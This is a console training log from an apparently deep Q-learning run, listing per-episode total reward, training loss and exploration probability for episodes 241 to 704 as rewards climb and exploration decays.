Episode: 241 Total reward: 37.0 Training loss: 2.1454 Explore P: 0.6679
Episode: 242 Total reward: 11.0 Training loss: 23.6042 Explore P: 0.6672
Episode: 243 Total reward: 32.0 Training loss: 1.4344 Explore P: 0.6651
Episode: 244 Total reward: 9.0 Training loss: 1.5328 Explore P: 0.6645
Episode: 245 Total reward: 14.0 Training loss: 84.7870 Explore P: 0.6636
Episode: 246 Total reward: 12.0 Training loss: 2.7292 Explore P: 0.6628
Episode: 247 Total reward: 26.0 Training loss: 40.6692 Explore P: 0.6611
Episode: 248 Total reward: 12.0 Training loss: 22.0901 Explore P: 0.6603
Episode: 249 Total reward: 15.0 Training loss: 37.9304 Explore P: 0.6594
Episode: 250 Total reward: 20.0 Training loss: 1.4137 Explore P: 0.6581
Episode: 251 Total reward: 16.0 Training loss: 1.7831 Explore P: 0.6570
Episode: 252 Total reward: 9.0 Training loss: 38.0640 Explore P: 0.6565
Episode: 253 Total reward: 17.0 Training loss: 21.7703 Explore P: 0.6554
Episode: 254 Total reward: 24.0 Training loss: 40.3204 Explore P: 0.6538
Episode: 255 Total reward: 30.0 Training loss: 43.4179 Explore P: 0.6519
Episode: 256 Total reward: 11.0 Training loss: 60.9330 Explore P: 0.6512
Episode: 257 Total reward: 14.0 Training loss: 66.6886 Explore P: 0.6503
Episode: 258 Total reward: 15.0 Training loss: 2.5639 Explore P: 0.6493
Episode: 259 Total reward: 19.0 Training loss: 2.6969 Explore P: 0.6481
Episode: 260 Total reward: 10.0 Training loss: 2.6837 Explore P: 0.6475
Episode: 261 Total reward: 30.0 Training loss: 20.6603 Explore P: 0.6456
Episode: 262 Total reward: 17.0 Training loss: 32.1585 Explore P: 0.6445
Episode: 263 Total reward: 15.0 Training loss: 1.0833 Explore P: 0.6435
Episode: 264 Total reward: 13.0 Training loss: 81.4551 Explore P: 0.6427
Episode: 265 Total reward: 17.0 Training loss: 3.3823 Explore P: 0.6416
Episode: 266 Total reward: 11.0 Training loss: 36.3942 Explore P: 0.6409
Episode: 267 Total reward: 11.0 Training loss: 1.6628 Explore P: 0.6402
Episode: 268 Total reward: 33.0 Training loss: 26.9925 Explore P: 0.6382
Episode: 269 Total reward: 18.0 Training loss: 45.8608 Explore P: 0.6370
Episode: 270 Total reward: 20.0 Training loss: 2.7911 Explore P: 0.6358
Episode: 271 Total reward: 10.0 Training loss: 35.9215 Explore P: 0.6352
Episode: 272 Total reward: 14.0 Training loss: 2.5923 Explore P: 0.6343
Episode: 273 Total reward: 16.0 Training loss: 41.2339 Explore P: 0.6333
Episode: 274 Total reward: 18.0 Training loss: 46.7318 Explore P: 0.6322
Episode: 275 Total reward: 14.0 Training loss: 2.7245 Explore P: 0.6313
Episode: 276 Total reward: 8.0 Training loss: 16.2681 Explore P: 0.6308
Episode: 277 Total reward: 10.0 Training loss: 21.6856 Explore P: 0.6302
Episode: 278 Total reward: 12.0 Training loss: 1.7879 Explore P: 0.6294
Episode: 279 Total reward: 10.0 Training loss: 97.1567 Explore P: 0.6288
Episode: 280 Total reward: 16.0 Training loss: 3.4710 Explore P: 0.6278
Episode: 281 Total reward: 14.0 Training loss: 65.8457 Explore P: 0.6270
Episode: 282 Total reward: 21.0 Training loss: 32.4442 Explore P: 0.6257
Episode: 283 Total reward: 17.0 Training loss: 48.0136 Explore P: 0.6246
Episode: 284 Total reward: 11.0 Training loss: 2.8833 Explore P: 0.6239
Episode: 285 Total reward: 16.0 Training loss: 92.6062 Explore P: 0.6230
Episode: 286 Total reward: 16.0 Training loss: 19.1051 Explore P: 0.6220
Episode: 287 Total reward: 7.0 Training loss: 1.8220 Explore P: 0.6216
Episode: 288 Total reward: 16.0 Training loss: 41.3844 Explore P: 0.6206
Episode: 289 Total reward: 18.0 Training loss: 50.0580 Explore P: 0.6195
Episode: 290 Total reward: 13.0 Training loss: 83.2142 Explore P: 0.6187
Episode: 291 Total reward: 14.0 Training loss: 70.2605 Explore P: 0.6178
Episode: 292 Total reward: 16.0 Training loss: 53.9664 Explore P: 0.6169
Episode: 293 Total reward: 17.0 Training loss: 3.2764 Explore P: 0.6158
Episode: 294 Total reward: 18.0 Training loss: 17.7963 Explore P: 0.6147
Episode: 295 Total reward: 17.0 Training loss: 32.3772 Explore P: 0.6137
Episode: 296 Total reward: 32.0 Training loss: 18.3755 Explore P: 0.6118
Episode: 297 Total reward: 29.0 Training loss: 17.1377 Explore P: 0.6100
Episode: 298 Total reward: 12.0 Training loss: 14.2922 Explore P: 0.6093
Episode: 299 Total reward: 14.0 Training loss: 29.2226 Explore P: 0.6085
Episode: 300 Total reward: 17.0 Training loss: 38.9089 Explore P: 0.6075
Episode: 301 Total reward: 9.0 Training loss: 62.2483 Explore P: 0.6069
Episode: 302 Total reward: 22.0 Training loss: 2.3240 Explore P: 0.6056
Episode: 303 Total reward: 16.0 Training loss: 0.9979 Explore P: 0.6047
Episode: 304 Total reward: 8.0 Training loss: 67.9231 Explore P: 0.6042
Episode: 305 Total reward: 13.0 Training loss: 33.0928 Explore P: 0.6034
Episode: 306 Total reward: 20.0 Training loss: 1.3173 Explore P: 0.6022
Episode: 307 Total reward: 23.0 Training loss: 50.2106 Explore P: 0.6009
Episode: 308 Total reward: 17.0 Training loss: 52.5245 Explore P: 0.5999
Episode: 309 Total reward: 20.0 Training loss: 32.5832 Explore P: 0.5987
Episode: 310 Total reward: 19.0 Training loss: 29.0224 Explore P: 0.5976
Episode: 311 Total reward: 19.0 Training loss: 29.8863 Explore P: 0.5965
Episode: 312 Total reward: 27.0 Training loss: 34.4016 Explore P: 0.5949
Episode: 313 Total reward: 9.0 Training loss: 1.1433 Explore P: 0.5944
Episode: 314 Total reward: 20.0 Training loss: 28.8137 Explore P: 0.5932
Episode: 315 Total reward: 24.0 Training loss: 48.5379 Explore P: 0.5918
Episode: 316 Total reward: 28.0 Training loss: 45.2671 Explore P: 0.5902
Episode: 317 Total reward: 13.0 Training loss: 45.9822 Explore P: 0.5894
Episode: 318 Total reward: 12.0 Training loss: 86.3972 Explore P: 0.5887
Episode: 319 Total reward: 10.0 Training loss: 11.2909 Explore P: 0.5881
Episode: 320 Total reward: 11.0 Training loss: 36.5474 Explore P: 0.5875
Episode: 321 Total reward: 13.0 Training loss: 1.1439 Explore P: 0.5867
Episode: 322 Total reward: 8.0 Training loss: 12.6978 Explore P: 0.5863
Episode: 323 Total reward: 20.0 Training loss: 31.7664 Explore P: 0.5851
Episode: 324 Total reward: 8.0 Training loss: 29.4243 Explore P: 0.5847
Episode: 325 Total reward: 13.0 Training loss: 12.2373 Explore P: 0.5839
Episode: 326 Total reward: 19.0 Training loss: 24.2228 Explore P: 0.5828
Episode: 327 Total reward: 68.0 Training loss: 0.7256 Explore P: 0.5790
Episode: 328 Total reward: 11.0 Training loss: 1.2313 Explore P: 0.5783
Episode: 329 Total reward: 15.0 Training loss: 1.3319 Explore P: 0.5775
Episode: 330 Total reward: 53.0 Training loss: 9.9350 Explore P: 0.5745
Episode: 331 Total reward: 74.0 Training loss: 1.4366 Explore P: 0.5703
Episode: 332 Total reward: 16.0 Training loss: 11.2724 Explore P: 0.5694
Episode: 333 Total reward: 34.0 Training loss: 10.6128 Explore P: 0.5675
Episode: 334 Total reward: 27.0 Training loss: 14.9559 Explore P: 0.5660
Episode: 335 Total reward: 31.0 Training loss: 16.6541 Explore P: 0.5643
Episode: 336 Total reward: 49.0 Training loss: 23.3966 Explore P: 0.5616
Episode: 337 Total reward: 40.0 Training loss: 45.3419 Explore P: 0.5594
Episode: 338 Total reward: 71.0 Training loss: 0.8244 Explore P: 0.5555
Episode: 339 Total reward: 56.0 Training loss: 41.4562 Explore P: 0.5525
Episode: 340 Total reward: 18.0 Training loss: 1.2548 Explore P: 0.5515
Episode: 341 Total reward: 56.0 Training loss: 1.5400 Explore P: 0.5485
Episode: 342 Total reward: 34.0 Training loss: 12.0206 Explore P: 0.5466
Episode: 343 Total reward: 67.0 Training loss: 1.4189 Explore P: 0.5430
Episode: 344 Total reward: 27.0 Training loss: 1.3138 Explore P: 0.5416
Episode: 345 Total reward: 42.0 Training loss: 1.1650 Explore P: 0.5394
Episode: 346 Total reward: 23.0 Training loss: 23.1743 Explore P: 0.5382
Episode: 347 Total reward: 54.0 Training loss: 0.6971 Explore P: 0.5353
Episode: 348 Total reward: 34.0 Training loss: 27.2789 Explore P: 0.5335
Episode: 349 Total reward: 25.0 Training loss: 37.4133 Explore P: 0.5322
Episode: 350 Total reward: 20.0 Training loss: 1.6443 Explore P: 0.5312
Episode: 351 Total reward: 26.0 Training loss: 12.6839 Explore P: 0.5298
Episode: 352 Total reward: 40.0 Training loss: 13.3593 Explore P: 0.5278
Episode: 353 Total reward: 18.0 Training loss: 1.7079 Explore P: 0.5268
Episode: 354 Total reward: 47.0 Training loss: 32.5788 Explore P: 0.5244
Episode: 355 Total reward: 20.0 Training loss: 1.6101 Explore P: 0.5234
Episode: 356 Total reward: 53.0 Training loss: 2.5321 Explore P: 0.5207
Episode: 357 Total reward: 15.0 Training loss: 1.6396 Explore P: 0.5199
Episode: 358 Total reward: 76.0 Training loss: 20.8058 Explore P: 0.5160
Episode: 359 Total reward: 12.0 Training loss: 13.0315 Explore P: 0.5154
Episode: 360 Total reward: 42.0 Training loss: 10.1313 Explore P: 0.5133
Episode: 361 Total reward: 53.0 Training loss: 25.4319 Explore P: 0.5106
Episode: 362 Total reward: 33.0 Training loss: 26.4256 Explore P: 0.5090
Episode: 363 Total reward: 85.0 Training loss: 20.2429 Explore P: 0.5048
Episode: 364 Total reward: 23.0 Training loss: 16.1083 Explore P: 0.5036
Episode: 365 Total reward: 30.0 Training loss: 1.6888 Explore P: 0.5022
Episode: 366 Total reward: 66.0 Training loss: 2.0408 Explore P: 0.4989
Episode: 367 Total reward: 37.0 Training loss: 18.6438 Explore P: 0.4971
Episode: 368 Total reward: 50.0 Training loss: 20.1544 Explore P: 0.4947
Episode: 369 Total reward: 78.0 Training loss: 23.8497 Explore P: 0.4909
Episode: 370 Total reward: 83.0 Training loss: 20.6897 Explore P: 0.4869
Episode: 371 Total reward: 44.0 Training loss: 25.4317 Explore P: 0.4849
Episode: 372 Total reward: 44.0 Training loss: 1.5212 Explore P: 0.4828
Episode: 373 Total reward: 14.0 Training loss: 1.5019 Explore P: 0.4821
Episode: 374 Total reward: 31.0 Training loss: 1.8348 Explore P: 0.4806
Episode: 375 Total reward: 25.0 Training loss: 19.7533 Explore P: 0.4795
Episode: 376 Total reward: 51.0 Training loss: 1.5433 Explore P: 0.4771
Episode: 377 Total reward: 23.0 Training loss: 12.9174 Explore P: 0.4760
Episode: 378 Total reward: 67.0 Training loss: 27.2318 Explore P: 0.4729
Episode: 379 Total reward: 26.0 Training loss: 1.9319 Explore P: 0.4717
Episode: 380 Total reward: 35.0 Training loss: 43.2445 Explore P: 0.4701
Episode: 381 Total reward: 33.0 Training loss: 1.5195 Explore P: 0.4686
Episode: 382 Total reward: 30.0 Training loss: 15.4622 Explore P: 0.4672
Episode: 383 Total reward: 12.0 Training loss: 1.8349 Explore P: 0.4666
Episode: 384 Total reward: 25.0 Training loss: 47.7600 Explore P: 0.4655
Episode: 385 Total reward: 36.0 Training loss: 29.6753 Explore P: 0.4639
Episode: 386 Total reward: 50.0 Training loss: 1.1244 Explore P: 0.4616
Episode: 387 Total reward: 35.0 Training loss: 1.0955 Explore P: 0.4600
Episode: 388 Total reward: 52.0 Training loss: 24.9624 Explore P: 0.4577
Episode: 389 Total reward: 52.0 Training loss: 28.2028 Explore P: 0.4554
Episode: 390 Total reward: 132.0 Training loss: 30.5190 Explore P: 0.4495
Episode: 391 Total reward: 25.0 Training loss: 10.3908 Explore P: 0.4484
Episode: 392 Total reward: 56.0 Training loss: 14.1483 Explore P: 0.4460
Episode: 393 Total reward: 110.0 Training loss: 2.0169 Explore P: 0.4412
Episode: 394 Total reward: 78.0 Training loss: 1.2122 Explore P: 0.4379
Episode: 395 Total reward: 44.0 Training loss: 56.4728 Explore P: 0.4360
Episode: 396 Total reward: 90.0 Training loss: 65.6667 Explore P: 0.4322
Episode: 397 Total reward: 36.0 Training loss: 0.9032 Explore P: 0.4307
Episode: 398 Total reward: 40.0 Training loss: 0.8414 Explore P: 0.4290
Episode: 399 Total reward: 109.0 Training loss: 42.5467 Explore P: 0.4244
Episode: 400 Total reward: 37.0 Training loss: 2.6053 Explore P: 0.4229
Episode: 401 Total reward: 62.0 Training loss: 1.2301 Explore P: 0.4203
Episode: 402 Total reward: 42.0 Training loss: 1.1384 Explore P: 0.4186
Episode: 403 Total reward: 71.0 Training loss: 1.6765 Explore P: 0.4157
Episode: 404 Total reward: 88.0 Training loss: 2.4000 Explore P: 0.4122
Episode: 405 Total reward: 55.0 Training loss: 24.7748 Explore P: 0.4100
Episode: 406 Total reward: 33.0 Training loss: 13.5934 Explore P: 0.4087
Episode: 407 Total reward: 44.0 Training loss: 14.6865 Explore P: 0.4069
Episode: 408 Total reward: 40.0 Training loss: 2.0898 Explore P: 0.4053
Episode: 409 Total reward: 98.0 Training loss: 2.1043 Explore P: 0.4015
Episode: 410 Total reward: 63.0 Training loss: 11.3562 Explore P: 0.3990
Episode: 411 Total reward: 50.0 Training loss: 14.1151 Explore P: 0.3971
Episode: 412 Total reward: 44.0 Training loss: 1.2370 Explore P: 0.3954
Episode: 413 Total reward: 56.0 Training loss: 2.1136 Explore P: 0.3932
Episode: 414 Total reward: 61.0 Training loss: 2.2578 Explore P: 0.3909
Episode: 415 Total reward: 49.0 Training loss: 1.3966 Explore P: 0.3890
Episode: 416 Total reward: 55.0 Training loss: 10.2836 Explore P: 0.3869
Episode: 417 Total reward: 121.0 Training loss: 2.2477 Explore P: 0.3824
Episode: 418 Total reward: 46.0 Training loss: 2.3118 Explore P: 0.3807
Episode: 419 Total reward: 70.0 Training loss: 27.3952 Explore P: 0.3781
Episode: 420 Total reward: 72.0 Training loss: 45.7570 Explore P: 0.3755
Episode: 421 Total reward: 41.0 Training loss: 59.1887 Explore P: 0.3740
Episode: 422 Total reward: 67.0 Training loss: 27.0998 Explore P: 0.3716
Episode: 423 Total reward: 46.0 Training loss: 43.1971 Explore P: 0.3699
Episode: 424 Total reward: 52.0 Training loss: 2.0718 Explore P: 0.3680
Episode: 425 Total reward: 92.0 Training loss: 96.7074 Explore P: 0.3647
Episode: 426 Total reward: 60.0 Training loss: 2.0684 Explore P: 0.3626
Episode: 427 Total reward: 106.0 Training loss: 54.1831 Explore P: 0.3589
Episode: 428 Total reward: 76.0 Training loss: 1.9612 Explore P: 0.3563
Episode: 429 Total reward: 42.0 Training loss: 1.6153 Explore P: 0.3548
Episode: 430 Total reward: 77.0 Training loss: 3.9801 Explore P: 0.3522
Episode: 431 Total reward: 123.0 Training loss: 2.0505 Explore P: 0.3480
Episode: 432 Total reward: 150.0 Training loss: 19.4217 Explore P: 0.3430
Episode: 433 Total reward: 57.0 Training loss: 1.5850 Explore P: 0.3411
Episode: 434 Total reward: 74.0 Training loss: 2.4292 Explore P: 0.3386
Episode: 435 Total reward: 97.0 Training loss: 23.5709 Explore P: 0.3354
Episode: 436 Total reward: 99.0 Training loss: 2.0727 Explore P: 0.3322
Episode: 437 Total reward: 101.0 Training loss: 22.3250 Explore P: 0.3290
Episode: 438 Total reward: 46.0 Training loss: 2.0320 Explore P: 0.3275
Episode: 439 Total reward: 51.0 Training loss: 4.8099 Explore P: 0.3259
Episode: 440 Total reward: 111.0 Training loss: 68.3524 Explore P: 0.3224
Episode: 441 Total reward: 167.0 Training loss: 2.3045 Explore P: 0.3173
Episode: 442 Total reward: 80.0 Training loss: 0.8798 Explore P: 0.3148
Episode: 443 Total reward: 170.0 Training loss: 48.6270 Explore P: 0.3097
Episode: 444 Total reward: 77.0 Training loss: 2.2555 Explore P: 0.3074
Episode: 445 Total reward: 84.0 Training loss: 3.0428 Explore P: 0.3049
Episode: 447 Total reward: 12.0 Training loss: 2.8022 Explore P: 0.2987
Episode: 448 Total reward: 66.0 Training loss: 120.3442 Explore P: 0.2968
Episode: 449 Total reward: 152.0 Training loss: 6.2880 Explore P: 0.2925
Episode: 450 Total reward: 141.0 Training loss: 2.8015 Explore P: 0.2885
Episode: 451 Total reward: 99.0 Training loss: 64.0921 Explore P: 0.2858
Episode: 452 Total reward: 79.0 Training loss: 1.5581 Explore P: 0.2836
Episode: 453 Total reward: 49.0 Training loss: 113.2557 Explore P: 0.2823
Episode: 455 Total reward: 106.0 Training loss: 210.4934 Explore P: 0.2741
Episode: 456 Total reward: 109.0 Training loss: 81.6662 Explore P: 0.2712
Episode: 457 Total reward: 56.0 Training loss: 3.2287 Explore P: 0.2697
Episode: 458 Total reward: 138.0 Training loss: 2.5795 Explore P: 0.2662
Episode: 459 Total reward: 93.0 Training loss: 3.4260 Explore P: 0.2638
Episode: 460 Total reward: 71.0 Training loss: 139.3341 Explore P: 0.2620
Episode: 461 Total reward: 106.0 Training loss: 2.6074 Explore P: 0.2594
Episode: 462 Total reward: 63.0 Training loss: 2.8252 Explore P: 0.2578
Episode: 463 Total reward: 71.0 Training loss: 25.8917 Explore P: 0.2560
Episode: 464 Total reward: 79.0 Training loss: 3.8067 Explore P: 0.2541
Episode: 465 Total reward: 86.0 Training loss: 1.6050 Explore P: 0.2520
Episode: 466 Total reward: 88.0 Training loss: 44.2827 Explore P: 0.2499
Episode: 467 Total reward: 72.0 Training loss: 0.7160 Explore P: 0.2482
Episode: 468 Total reward: 152.0 Training loss: 75.7239 Explore P: 0.2446
Episode: 469 Total reward: 122.0 Training loss: 7.4345 Explore P: 0.2417
Episode: 470 Total reward: 81.0 Training loss: 101.0922 Explore P: 0.2399
Episode: 471 Total reward: 38.0 Training loss: 1.6301 Explore P: 0.2390
Episode: 472 Total reward: 79.0 Training loss: 72.4920 Explore P: 0.2372
Episode: 473 Total reward: 190.0 Training loss: 1.3869 Explore P: 0.2329
Episode: 474 Total reward: 197.0 Training loss: 1.5386 Explore P: 0.2286
Episode: 476 Total reward: 42.0 Training loss: 0.8364 Explore P: 0.2233
Episode: 477 Total reward: 134.0 Training loss: 88.3979 Explore P: 0.2205
Episode: 478 Total reward: 128.0 Training loss: 94.1007 Explore P: 0.2178
Episode: 479 Total reward: 79.0 Training loss: 103.1366 Explore P: 0.2162
Episode: 480 Total reward: 169.0 Training loss: 58.8788 Explore P: 0.2127
Episode: 481 Total reward: 160.0 Training loss: 1.1934 Explore P: 0.2095
Episode: 482 Total reward: 81.0 Training loss: 2.9244 Explore P: 0.2079
Episode: 484 Total reward: 68.0 Training loss: 77.9688 Explore P: 0.2027
Episode: 486 Total reward: 17.0 Training loss: 0.6864 Explore P: 0.1985
Episode: 488 Total reward: 62.0 Training loss: 1.9978 Explore P: 0.1937
Episode: 489 Total reward: 178.0 Training loss: 228.6335 Explore P: 0.1904
Episode: 490 Total reward: 114.0 Training loss: 0.4453 Explore P: 0.1884
Episode: 491 Total reward: 127.0 Training loss: 1.6523 Explore P: 0.1861
Episode: 492 Total reward: 124.0 Training loss: 120.2207 Explore P: 0.1840
Episode: 493 Total reward: 184.0 Training loss: 0.5913 Explore P: 0.1808
Episode: 494 Total reward: 129.0 Training loss: 56.3829 Explore P: 0.1786
Episode: 495 Total reward: 95.0 Training loss: 1.9883 Explore P: 0.1770
Episode: 496 Total reward: 129.0 Training loss: 1.2513 Explore P: 0.1749
Episode: 497 Total reward: 176.0 Training loss: 1.0322 Explore P: 0.1720
Episode: 498 Total reward: 132.0 Training loss: 0.9320 Explore P: 0.1699
Episode: 499 Total reward: 146.0 Training loss: 289.4379 Explore P: 0.1675
Episode: 500 Total reward: 147.0 Training loss: 0.5124 Explore P: 0.1652
Episode: 501 Total reward: 166.0 Training loss: 0.9444 Explore P: 0.1627
Episode: 503 Total reward: 31.0 Training loss: 1.4756 Explore P: 0.1592
Episode: 504 Total reward: 129.0 Training loss: 0.6077 Explore P: 0.1573
Episode: 505 Total reward: 127.0 Training loss: 1.2508 Explore P: 0.1554
Episode: 506 Total reward: 123.0 Training loss: 0.8265 Explore P: 0.1537
Episode: 507 Total reward: 159.0 Training loss: 260.4604 Explore P: 0.1514
Episode: 508 Total reward: 136.0 Training loss: 0.9311 Explore P: 0.1495
Episode: 509 Total reward: 198.0 Training loss: 0.9262 Explore P: 0.1467
Episode: 511 Total reward: 40.0 Training loss: 2.3126 Explore P: 0.1435
Episode: 512 Total reward: 130.0 Training loss: 1.2985 Explore P: 0.1418
Episode: 514 Total reward: 25.0 Training loss: 1.1655 Explore P: 0.1388
Episode: 515 Total reward: 149.0 Training loss: 214.9246 Explore P: 0.1369
Episode: 516 Total reward: 200.0 Training loss: 0.8085 Explore P: 0.1344
Episode: 517 Total reward: 172.0 Training loss: 24.9451 Explore P: 0.1323
Episode: 519 Total reward: 52.0 Training loss: 61.7503 Explore P: 0.1293
Episode: 520 Total reward: 176.0 Training loss: 0.4361 Explore P: 0.1272
Episode: 521 Total reward: 160.0 Training loss: 1.8377 Explore P: 0.1253
Episode: 522 Total reward: 180.0 Training loss: 1.5684 Explore P: 0.1233
Episode: 523 Total reward: 174.0 Training loss: 58.6258 Explore P: 0.1213
Episode: 525 Total reward: 10.0 Training loss: 222.1836 Explore P: 0.1190
Episode: 527 Total reward: 32.0 Training loss: 0.4007 Explore P: 0.1165
Episode: 529 Total reward: 33.0 Training loss: 0.3054 Explore P: 0.1140
Episode: 530 Total reward: 185.0 Training loss: 0.7425 Explore P: 0.1121
Episode: 531 Total reward: 171.0 Training loss: 0.3441 Explore P: 0.1104
Episode: 532 Total reward: 199.0 Training loss: 0.2333 Explore P: 0.1084
Episode: 534 Total reward: 95.0 Training loss: 0.4929 Explore P: 0.1056
Episode: 536 Total reward: 8.0 Training loss: 0.5416 Explore P: 0.1036
Episode: 538 Total reward: 42.0 Training loss: 163.3946 Explore P: 0.1014
Episode: 539 Total reward: 180.0 Training loss: 0.2803 Explore P: 0.0997
Episode: 540 Total reward: 193.0 Training loss: 0.4929 Explore P: 0.0980
Episode: 542 Total reward: 36.0 Training loss: 0.7983 Explore P: 0.0960
Episode: 544 Total reward: 152.0 Training loss: 41.4165 Explore P: 0.0930
Episode: 546 Total reward: 30.0 Training loss: 0.7570 Explore P: 0.0911
Episode: 548 Total reward: 50.0 Training loss: 0.3215 Explore P: 0.0891
Episode: 550 Total reward: 79.0 Training loss: 0.5349 Explore P: 0.0869
Episode: 552 Total reward: 38.0 Training loss: 0.3635 Explore P: 0.0851
Episode: 553 Total reward: 131.0 Training loss: 0.3965 Explore P: 0.0841
Episode: 554 Total reward: 135.0 Training loss: 0.2453 Explore P: 0.0831
Episode: 555 Total reward: 111.0 Training loss: 0.9434 Explore P: 0.0823
Episode: 556 Total reward: 136.0 Training loss: 0.7058 Explore P: 0.0814
Episode: 557 Total reward: 106.0 Training loss: 0.4755 Explore P: 0.0806
Episode: 558 Total reward: 98.0 Training loss: 0.4107 Explore P: 0.0799
Episode: 559 Total reward: 102.0 Training loss: 62.3874 Explore P: 0.0792
Episode: 560 Total reward: 92.0 Training loss: 0.4026 Explore P: 0.0786
Episode: 561 Total reward: 86.0 Training loss: 0.3649 Explore P: 0.0780
Episode: 562 Total reward: 83.0 Training loss: 0.5843 Explore P: 0.0774
Episode: 563 Total reward: 100.0 Training loss: 0.1493 Explore P: 0.0768
Episode: 564 Total reward: 102.0 Training loss: 0.4021 Explore P: 0.0761
Episode: 565 Total reward: 60.0 Training loss: 0.3445 Explore P: 0.0757
Episode: 566 Total reward: 63.0 Training loss: 0.2461 Explore P: 0.0753
Episode: 567 Total reward: 59.0 Training loss: 0.2115 Explore P: 0.0749
Episode: 568 Total reward: 73.0 Training loss: 3.2738 Explore P: 0.0744
Episode: 569 Total reward: 70.0 Training loss: 0.4267 Explore P: 0.0740
Episode: 570 Total reward: 53.0 Training loss: 0.8779 Explore P: 0.0736
Episode: 571 Total reward: 88.0 Training loss: 187.5536 Explore P: 0.0731
Episode: 572 Total reward: 54.0 Training loss: 0.3208 Explore P: 0.0727
Episode: 573 Total reward: 87.0 Training loss: 0.2894 Explore P: 0.0722
Episode: 574 Total reward: 58.0 Training loss: 0.2578 Explore P: 0.0718
Episode: 575 Total reward: 85.0 Training loss: 0.3401 Explore P: 0.0713
Episode: 576 Total reward: 73.0 Training loss: 0.2245 Explore P: 0.0709
Episode: 577 Total reward: 114.0 Training loss: 0.3640 Explore P: 0.0702
Episode: 578 Total reward: 94.0 Training loss: 0.7954 Explore P: 0.0696
Episode: 579 Total reward: 114.0 Training loss: 0.2615 Explore P: 0.0689
Episode: 580 Total reward: 80.0 Training loss: 0.4812 Explore P: 0.0685
Episode: 581 Total reward: 125.0 Training loss: 0.8818 Explore P: 0.0677
Episode: 582 Total reward: 109.0 Training loss: 0.2953 Explore P: 0.0671
Episode: 583 Total reward: 98.0 Training loss: 0.4371 Explore P: 0.0665
Episode: 584 Total reward: 119.0 Training loss: 0.4685 Explore P: 0.0659
Episode: 585 Total reward: 96.0 Training loss: 0.3440 Explore P: 0.0653
Episode: 586 Total reward: 172.0 Training loss: 0.1414 Explore P: 0.0644
Episode: 587 Total reward: 104.0 Training loss: 0.3309 Explore P: 0.0638
Episode: 588 Total reward: 85.0 Training loss: 0.2262 Explore P: 0.0634
Episode: 590 Total reward: 104.0 Training loss: 0.3231 Explore P: 0.0618
Episode: 591 Total reward: 148.0 Training loss: 0.4431 Explore P: 0.0610
Episode: 592 Total reward: 135.0 Training loss: 0.1894 Explore P: 0.0603
Episode: 595 Total reward: 99.0 Training loss: 0.2376 Explore P: 0.0579
Episode: 597 Total reward: 172.0 Training loss: 0.4083 Explore P: 0.0561
Episode: 600 Total reward: 99.0 Training loss: 0.1152 Explore P: 0.0539
Episode: 603 Total reward: 99.0 Training loss: 0.3594 Explore P: 0.0518
Episode: 604 Total reward: 149.0 Training loss: 0.1398 Explore P: 0.0511
Episode: 607 Total reward: 99.0 Training loss: 0.3337 Explore P: 0.0491
Episode: 608 Total reward: 180.0 Training loss: 7.4786 Explore P: 0.0484
Episode: 611 Total reward: 28.0 Training loss: 0.1953 Explore P: 0.0468
Episode: 614 Total reward: 38.0 Training loss: 0.3152 Explore P: 0.0453
Episode: 617 Total reward: 50.0 Training loss: 0.4420 Explore P: 0.0437
Episode: 620 Total reward: 9.0 Training loss: 0.3347 Explore P: 0.0423
Episode: 623 Total reward: 99.0 Training loss: 0.1405 Explore P: 0.0408
Episode: 626 Total reward: 78.0 Training loss: 0.1488 Explore P: 0.0393
Episode: 628 Total reward: 198.0 Training loss: 0.9185 Explore P: 0.0382
Episode: 631 Total reward: 99.0 Training loss: 0.3505 Explore P: 0.0368
Episode: 633 Total reward: 142.0 Training loss: 0.1654 Explore P: 0.0359
Episode: 635 Total reward: 134.0 Training loss: 0.3178 Explore P: 0.0351
Episode: 637 Total reward: 104.0 Training loss: 0.3331 Explore P: 0.0343
Episode: 639 Total reward: 73.0 Training loss: 66.8497 Explore P: 0.0337
Episode: 641 Total reward: 35.0 Training loss: 0.1411 Explore P: 0.0331
Episode: 643 Total reward: 83.0 Training loss: 0.2136 Explore P: 0.0325
Episode: 645 Total reward: 62.0 Training loss: 0.2303 Explore P: 0.0319
Episode: 647 Total reward: 28.0 Training loss: 0.2552 Explore P: 0.0314
Episode: 649 Total reward: 4.0 Training loss: 0.1967 Explore P: 0.0310
Episode: 650 Total reward: 194.0 Training loss: 0.1424 Explore P: 0.0306
Episode: 651 Total reward: 170.0 Training loss: 0.1509 Explore P: 0.0302
Episode: 652 Total reward: 150.0 Training loss: 0.2699 Explore P: 0.0299
Episode: 653 Total reward: 161.0 Training loss: 0.2821 Explore P: 0.0296
Episode: 654 Total reward: 148.0 Training loss: 0.4859 Explore P: 0.0293
Episode: 655 Total reward: 142.0 Training loss: 0.1541 Explore P: 0.0290
Episode: 656 Total reward: 140.0 Training loss: 0.0963 Explore P: 0.0288
Episode: 657 Total reward: 144.0 Training loss: 0.3165 Explore P: 0.0285
Episode: 658 Total reward: 160.0 Training loss: 0.2059 Explore P: 0.0282
Episode: 659 Total reward: 127.0 Training loss: 0.0918 Explore P: 0.0280
Episode: 660 Total reward: 124.0 Training loss: 431.4700 Explore P: 0.0278
Episode: 661 Total reward: 127.0 Training loss: 0.2660 Explore P: 0.0275
Episode: 662 Total reward: 133.0 Training loss: 0.4122 Explore P: 0.0273
Episode: 663 Total reward: 119.0 Training loss: 0.2070 Explore P: 0.0271
Episode: 664 Total reward: 114.0 Training loss: 0.3453 Explore P: 0.0269
Episode: 665 Total reward: 130.0 Training loss: 0.3865 Explore P: 0.0267
Episode: 666 Total reward: 125.0 Training loss: 0.2518 Explore P: 0.0265
Episode: 667 Total reward: 138.0 Training loss: 0.1668 Explore P: 0.0263
Episode: 669 Total reward: 42.0 Training loss: 0.3241 Explore P: 0.0259
Episode: 671 Total reward: 105.0 Training loss: 0.1787 Explore P: 0.0254
Episode: 674 Total reward: 99.0 Training loss: 0.2393 Explore P: 0.0246
Episode: 677 Total reward: 99.0 Training loss: 0.2190 Explore P: 0.0239
Episode: 680 Total reward: 99.0 Training loss: 2.5996 Explore P: 0.0232
Episode: 683 Total reward: 99.0 Training loss: 0.3376 Explore P: 0.0226
Episode: 686 Total reward: 99.0 Training loss: 0.5884 Explore P: 0.0220
Episode: 689 Total reward: 99.0 Training loss: 0.1356 Explore P: 0.0214
Episode: 692 Total reward: 99.0 Training loss: 0.0920 Explore P: 0.0208
Episode: 695 Total reward: 99.0 Training loss: 0.1880 Explore P: 0.0203
Episode: 698 Total reward: 99.0 Training loss: 0.0951 Explore P: 0.0198
Episode: 701 Total reward: 99.0 Training loss: 0.1050 Explore P: 0.0193
Episode: 704 Total reward: 99.0 Training loss: 0.1234 Explore P: 0.0189
